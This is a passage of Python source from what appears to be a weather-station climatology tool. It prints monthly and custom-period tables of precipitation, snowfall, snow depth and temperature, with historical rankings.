metclmt[y] and len(metclmt[y][4]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tmin"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tmin"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tmin"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tmin"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tmin"]) > 1 else "", )) print("{:-^73}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|".format("","SEP {}".format(y),"OCT {}".format(y),"NOV {}".format(y),"DEC {}".format(y),"JAN {}".format(y+1),"FEB {}".format(y+1))) print("{:-^73}".format("")) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "PRCP", "{:.2f}".format(round(sum(metclmt[y][9]["prcp"]),2)) if 9 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][10]["prcp"]),2)) if 10 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][11]["prcp"]),2)) if 11 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][12]["prcp"]),2)) if 12 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][1]["prcp"]),2)) if 1 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][2]["prcp"]),2)) if 2 in metclmt[y] else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "SNOW", "{:.1f}".format(round(sum(metclmt[y][9]["snow"]),1)) if 9 in metclmt[y] and (sum(metclmt[y][9]["snow"]) > 0 or metclmt[y][9]["snowDAYS"] > 0) else (" -- " if 9 in metclmt[y] and sum(metclmt[y][9]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][10]["snow"]),1)) if 10 in metclmt[y] and (sum(metclmt[y][10]["snow"]) > 0 or metclmt[y][10]["snowDAYS"] > 0) else (" -- " if 10 in metclmt[y] and sum(metclmt[y][10]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][11]["snow"]),1)) if 11 in metclmt[y] and (sum(metclmt[y][11]["snow"]) > 0 or metclmt[y][11]["snowDAYS"] > 0) else (" -- " if 11 in metclmt[y] and sum(metclmt[y][11]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][12]["snow"]),1)) if 12 in metclmt[y] and (sum(metclmt[y][12]["snow"]) > 0 or metclmt[y][12]["snowDAYS"] > 0) else (" -- " if 12 in metclmt[y] and sum(metclmt[y][12]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][1]["snow"]),1)) if 1 in metclmt[y] and (sum(metclmt[y][1]["snow"]) > 0 or metclmt[y][1]["snowDAYS"] > 0) else (" -- " if 1 in metclmt[y] and sum(metclmt[y][1]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][2]["snow"]),1)) if 2 in metclmt[y] and (sum(metclmt[y][2]["snow"]) > 0 or metclmt[y][2]["snowDAYS"] > 0) else (" -- " if 2 in metclmt[y] and sum(metclmt[y][2]["snow"]) == 0 else ""), )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TAVG", "{:.1f}".format(round(mean(metclmt[y][9]["tempAVGlist"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][10]["tempAVGlist"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tempAVGlist"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tempAVGlist"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tempAVGlist"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tempAVGlist"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMAX", "{:.1f}".format(round(mean(metclmt[y][9]["tmax"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][10]["tmax"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tmax"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tmax"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tmax"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tmax"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tmax"]) > 1 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMIN", "{:.1f}".format(round(mean(metclmt[y][9]["tmin"]),1)) if 9 in metclmt[y] and len(metclmt[y][9]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][10]["tmin"]),1)) if 10 in metclmt[y] and len(metclmt[y][10]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][11]["tmin"]),1)) if 11 in metclmt[y] and len(metclmt[y][11]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][12]["tmin"]),1)) if 12 in metclmt[y] and len(metclmt[y][12]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][1]["tmin"]),1)) if 1 in metclmt[y] and len(metclmt[y][1]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][2]["tmin"]),1)) if 2 in metclmt[y] and len(metclmt[y][2]["tmin"]) > 1 else "", )) print("{:-^73}".format("")) print(" Total Precipitation: {}".format(round(sum(metclmt[y]["prcp"]),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2))+1)),end="") if sum(metclmt[y]["prcp"]) > 0 and prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2)) <= prcpaschist.index(round(sum(metclmt[y]["prcp"]),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(metclmt[y]["prcp"]),2))+1))) if metclmt[y]["recordqty"] > excludeyear and prcpaschist.index(round(sum(metclmt[y]["prcp"]),2)) <= prcpdeschist.index(round(sum(metclmt[y]["prcp"]),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(metclmt[y]["prcpDAYS"]),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"])+1)),end="") if metclmt[y]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"]) <= prcpDAYSaschist.index(metclmt[y]["prcpDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(metclmt[y]["prcpDAYS"])+1))) if prcpDAYSaschist.index(metclmt[y]["prcpDAYS"]) <= prcpDAYSdeschist.index(metclmt[y]["prcpDAYS"]) else print("") except: print("") if round(sum(metclmt[y]["prcp"]),2) > 0: print(" -- Highest Daily Precip: {}".format(metclmt[y]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["prcpPROP"]["day_max"][1][len(metclmt[y]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow: {}".format(round(sum(metclmt[y]["snow"]),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y]["snow"]),1))+1)),end="") if sum(metclmt[y]["snow"]) > 0 and snowdeschist.index(round(sum(metclmt[y]["snow"]),1)) <= snowaschist.index(round(sum(metclmt[y]["snow"]),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y]["snow"]),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(metclmt[y]["snow"]),1))+1))) if metclmt[y]["recordqty"] > excludeyear and snowaschist.index(round(sum(metclmt[y]["snow"]),1)) <= snowdeschist.index(round(sum(metclmt[y]["snow"]),1)) else print("") except: print("") print(" Total Snow Days (>=T): {}".format(metclmt[y]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y]["snowDAYS"])+1)),end="") if metclmt[y]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y]["snowDAYS"])+1))) if metclmt[y]["recordqty"] > excludeyear and snowDAYSaschist.index(metclmt[y]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y]["snowDAYS"]) else print("") except: print("") if metclmt[y]["snwdDAYS"] > 0: print(" Total Days w/Snow on the Ground (>=T): {}".format(metclmt[y]["snwdDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"])+1)),end="") if metclmt[y]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"]) <= snwdDAYSaschist.index(metclmt[y]["snwdDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(metclmt[y]["snwdDAYS"])+1))) if metclmt[y]["recordqty"] > excludeyear and snwdDAYSaschist.index(metclmt[y]["snwdDAYS"]) <= snwdDAYSdeschist.index(metclmt[y]["snwdDAYS"]) else print("") except: print("") if round(sum(metclmt[y]["snwd"]),1) > 0: print(" -- Highest Daily Snow-Depth: {}".format(metclmt[y]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["snwdPROP"]["day_max"][1][len(metclmt[y]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print(" Average Temperature: {}".format(round(mean(metclmt[y]["tempAVGlist"]),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1))+1)),end="") if len(metclmt[y]["tempAVGlist"]) > excludeyear*2 and tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1))+1))) if len(metclmt[y]["tempAVGlist"]) > excludeyear*2 and tavgaschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(metclmt[y]["tempAVGlist"]),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(metclmt[y]["tmax"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1))+1)),end="") if len(metclmt[y]["tmax"]) > excludeyear and tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1)) <= tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1))+1))) if len(metclmt[y]["tmax"]) > excludeyear and tmaxaschist.index(round(mean(metclmt[y]["tmax"]),1)) <= tmaxdeschist.index(round(mean(metclmt[y]["tmax"]),1)) else print("") except: print(" Avg MAX Temperature: N/A") if metclmt[y]["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(metclmt[y]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tmaxPROP"]["day_max"][1][len(metclmt[y]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y]["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(metclmt[y]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tmaxPROP"]["day_min"][1][len(metclmt[y]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) try: print(" Avg MIN Temperature: {}".format(round(mean(metclmt[y]["tmin"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(metclmt[y]["tmin"]),1))+1)),end="") if len(metclmt[y]["tmin"]) > excludeyear and tmindeschist.index(round(mean(metclmt[y]["tmin"]),1)) <= tminaschist.index(round(mean(metclmt[y]["tmin"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(metclmt[y]["tmin"]),1))+1))) if len(metclmt[y]["tmin"]) > excludeyear and tminaschist.index(round(mean(metclmt[y]["tmin"]),1)) <= tmindeschist.index(round(mean(metclmt[y]["tmin"]),1)) else print("") except: print(" Avg MIN Temperature: N/A") if metclmt[y]["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(metclmt[y]["tminPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tminPROP"]["day_max"][1][len(metclmt[y]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y]["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(metclmt[y]["tminPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y]["tminPROP"]["day_min"][1][len(metclmt[y]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) if all(len(x) == 0 for x in [metclmt[y]["tempAVGlist"],metclmt[y]["tmax"],metclmt[y]["tmin"]]): print("*** No Reliable Temperature Data for {} {}".format(calendar.month_abbr,y)) print("-----") def customStats(y1,m1,d1,*date2): """Report on a custom-length period of recorded statistics. All passed arguments MUST be integers. If the optional ending arguments are not included, the default ending will be December 31 of the calendar year, given by Y1; does not accept values of greater than a year customStats(Y1,M1,D1,*[Y2,M2,D2]) REQUIRED: Y1,M1,D1 --> Represent the beginning year, month, and date of the custom period. OPT *args: Y2,M2,D2 --> These optional entries represent the ending year, month, and date of the period EXAMPLE: customStats(1999,8,12) -> Returns a printout of statistics from August 12th, 1999 to December 31, 1999. """ if any(type(x) != int for x in [y1,m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***") valid1 = checkDate(y1,m1,d1) if len(date2) == 0: pass elif len(date2) != 3: return print("*** OOPS! For the 2nd (optional) date, ensure a Year, Month and Date are entered ***") else: if any(type(x) != int for x in [date2[0],date2[1],date2[2]]): return print("*** OOPS! Ensure that only integers are entered ***") valid2 = checkDate(date2[0],date2[1],date2[2]) startday = datetime.date(y1,m1,d1) incr_day = startday if len(date2) == 3: endday = datetime.date(date2[0],date2[1],date2[2]) else: emo = max(M for M in clmt[startday.year] if type(M) == int) edy = max(D for D in clmt[startday.year][emo] if type(D) == int) endday = datetime.date(startday.year,emo,edy) if endday <= startday: return print("*** OOPS! Pick an earlier start-day or (if applicable) a later end-day ***") # This handles if the passed time is greater than a year if endday >= datetime.date(startday.year+1,startday.month,startday.day): if endday == datetime.date(startday.year+1,startday.month,startday.day): endday = datetime.date(startday.year+1,startday.month,startday.day)-datetime.timedelta(days=1) else: return print("*** OOPS! customStats only accepts a temporal scope of a year or less") c_prcp = [] c_prcpDAYS = 0 c_snow = [] c_snowDAYS = 0 c_snwd = [] c_snwdDAYS = 0 c_temp = [] c_tmax = [] c_tmin = [] records_in_period = 0 c_records = {"prcpPROP":{"day_max":[-1,[]]}, "snowPROP":{"day_max":[-1,[]]}, "snwdPROP":{"day_max":[-1,[]]}, "tempPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} # Determine total length of period (used for exclusion calculation) s = datetime.date(1900,startday.month,startday.day) test = datetime.date(1900,endday.month,endday.day) if test > s: e = test else: e = datetime.date(1901,endday.month,endday.day) timelength = (e - s).days + 1 if timelength <= 5: EXCLD = timelength-1 elif timelength == 6: EXCLD = 4 elif timelength == 7: EXCLD = excludeweek elif timelength == 8: EXCLD = excludeweek elif timelength in [28,29,30,31]: EXCLD = excludemonth elif timelength >= 350: EXCLD = excludeyear else: EXCLD = round(excludecustom * timelength) while incr_day <= endday: y = incr_day.year; m = incr_day.month; d = incr_day.day if y in clmt and m in clmt[y] and d in clmt[y][m]: # If a record for clmt[y][m][d] exists records_in_period += 1 if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: c_prcp.append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == c_records["prcpPROP"]["day_max"][0]: c_records["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > c_records["prcpPROP"]["day_max"][0]: c_records["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) c_records["prcpPROP"]["day_max"][1] = [] c_records["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""] and float(clmt[y][m][d].prcp) != 0 or clmt[y][m][d].prcpM == "T": c_prcpDAYS += 1 if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: c_snow.append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),2) == c_records["snowPROP"]["day_max"][0]: c_records["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),2) > c_records["snowPROP"]["day_max"][0]: c_records["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),2) c_records["snowPROP"]["day_max"][1] = [] c_records["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""] and float(clmt[y][m][d].snow) != 0 or clmt[y][m][d].snowM == "T": c_snowDAYS += 1 if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: c_snwd.append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == c_records["snwdPROP"]["day_max"][0]: c_records["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if round(float(clmt[y][m][d].snwd),1) > c_records["snwdPROP"]["day_max"][0]: c_records["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) c_records["snwdPROP"]["day_max"][1] = [clmt[y][m][d]] if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": c_snwdDAYS += 1 if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tmin not in ["9999","-9999",""]: c_temp.append(int(clmt[y][m][d].tmax)) c_temp.append(int(clmt[y][m][d].tmin)) if round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) == c_records["tempPROP"]["day_max"][0]: c_records["tempPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) > c_records["tempPROP"]["day_max"][0]: c_records["tempPROP"]["day_max"][0] = round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) c_records["tempPROP"]["day_max"][1] = [] c_records["tempPROP"]["day_max"][1].append(clmt[y][m][d]) if round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) == c_records["tempPROP"]["day_min"][0]: c_records["tempPROP"]["day_min"][1].append(clmt[y][m][d]) elif round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) < c_records["tempPROP"]["day_min"][0]: c_records["tempPROP"]["day_min"][0] = round(mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]),1) c_records["tempPROP"]["day_min"][1] = [] c_records["tempPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: c_tmax.append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == c_records["tmaxPROP"]["day_max"][0]: c_records["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > c_records["tmaxPROP"]["day_max"][0]: c_records["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) c_records["tmaxPROP"]["day_max"][1] = [] c_records["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == c_records["tmaxPROP"]["day_min"][0]: c_records["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < c_records["tmaxPROP"]["day_min"][0]: c_records["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) c_records["tmaxPROP"]["day_min"][1] = [] c_records["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: c_tmin.append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == c_records["tminPROP"]["day_max"][0]: c_records["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > c_records["tminPROP"]["day_max"][0]: c_records["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) c_records["tminPROP"]["day_max"][1] = [] c_records["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == c_records["tminPROP"]["day_min"][0]: c_records["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < c_records["tminPROP"]["day_min"][0]: c_records["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) c_records["tminPROP"]["day_min"][1] = [] c_records["tminPROP"]["day_min"][1].append(clmt[y][m][d]) incr_day += datetime.timedelta(days=1) # customRank(attribute,quantity,M1,D1,*[M2,D2]) prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = customRank("temp",5,startday.month,startday.day,endday.month,endday.day,customStatsRun=True) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(len(x)) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(x) print("") print("Statistics for {}-{}-{} thru {}-{}-{}".format(startday.year,startday.month,startday.day, endday.year,endday.month,endday.day)) print("{}: {}".format(clmt["station"],clmt["station_name"])) print("Quantity of Records: {}".format(records_in_period)) print("-------------------------------------") """ c_prcp = [] c_prcpDAYS = 0 c_snow = [] c_snowDAYS = 0 c_snwd = [] c_temp = [] c_tmax = [] c_tmin = [] records_in_period = 0 c_records = {"prcpPROP":{"day_max":[-1,[]]}, "snowPROP":{"day_max":[-1,[]]}, "tempPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} """ print(" Total Precipitation: {}".format(round(sum(c_prcp),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(c_prcp),2))+1)),end="") if sum(c_prcp) > 0 and prcpdeschist.index(round(sum(c_prcp),2)) <= prcpaschist.index(round(sum(c_prcp),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(c_prcp),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(c_prcp),2))+1))) if records_in_period > EXCLD and prcpaschist.index(round(sum(c_prcp),2)) <= prcpdeschist.index(round(sum(c_prcp),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(c_prcpDAYS),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(c_prcpDAYS)+1)),end="") if c_prcpDAYS > 0 and prcpDAYSdeschist.index(c_prcpDAYS) <= prcpDAYSaschist.index(c_prcpDAYS) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(c_prcpDAYS)+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(c_prcpDAYS)+1))) if records_in_period > EXCLD and prcpDAYSaschist.index(c_prcpDAYS) <= prcpDAYSdeschist.index(c_prcpDAYS) else print("") except: print("") if round(sum(c_prcp),2) > 0: print(" -- Highest Daily Precip: {}".format(c_records["prcpPROP"]["day_max"][0]),end = " ::: ") for x in c_records["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["prcpPROP"]["day_max"][1][-1] else print("{}".format(x.daystr)) if c_snowDAYS > 0: print(" Total Snow: {}".format(round(sum(c_snow),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(c_snow),1))+1)),end="") if sum(c_snow) > 0 and snowdeschist.index(round(sum(c_snow),1)) <= snowaschist.index(round(sum(c_snow),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(c_snow),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(c_snow),1))+1))) if records_in_period > EXCLD and snowaschist.index(round(sum(c_snow),1)) <= snowdeschist.index(round(sum(c_snow),1)) else print("") except: print("") print(" Total Snow Days (>=T): {}".format(c_snowDAYS),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(c_snowDAYS)+1)),end="") if c_snowDAYS > 0 and snowDAYSdeschist.index(c_snowDAYS) <= snowDAYSaschist.index(c_snowDAYS) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(c_snowDAYS)+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(c_snowDAYS)+1))) if records_in_period > EXCLD and snowDAYSaschist.index(c_snowDAYS) <= snowDAYSdeschist.index(c_snowDAYS) else print("") except: print("") if c_records["snowPROP"]["day_max"][0] > 0: print("-- Snowiest Day: {}".format(c_records["snowPROP"]["day_max"][0]),end=" ::: ") for x in c_records["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr),end=" ") if x!= c_records["snowPROP"]["day_max"][1][-1] else print(x.daystr) if len(c_snwd) > 0: print(" Total Days w/Snow on the Ground: {}".format(c_snwdDAYS)) print("-- Highest Snow-Depth: {:.1f}".format(c_records["snwdPROP"]["day_max"][0]),end=" ::: ") for x in c_records["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr),end="") if x != c_records["snwdPROP"]["day_max"][1][-1] else print(x.daystr) try: print(" Average Temperature: {}".format(round(mean(c_temp),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(c_temp),1))+1)),end="") if len(c_temp) > EXCLD*2 and tavgdeschist.index(round(mean(c_temp),1)) <= tavgaschist.index(round(mean(c_temp),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(c_temp),1))+1))) if len(c_temp) > EXCLD*2 and tavgaschist.index(round(mean(c_temp),1)) <= tavgdeschist.index(round(mean(c_temp),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(c_tmax),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(c_tmax),1))+1)),end="") if len(c_tmax) > EXCLD and tmaxdeschist.index(round(mean(c_tmax),1)) <= tmaxaschist.index(round(mean(c_tmax),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(c_tmax),1))+1))) if len(c_tmax) > EXCLD and tmaxaschist.index(round(mean(c_tmax),1)) <= tmaxdeschist.index(round(mean(c_tmax),1)) else print("") except: print(" Avg MAX Temperature: N/A") if c_records["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(c_records["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in c_records["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), 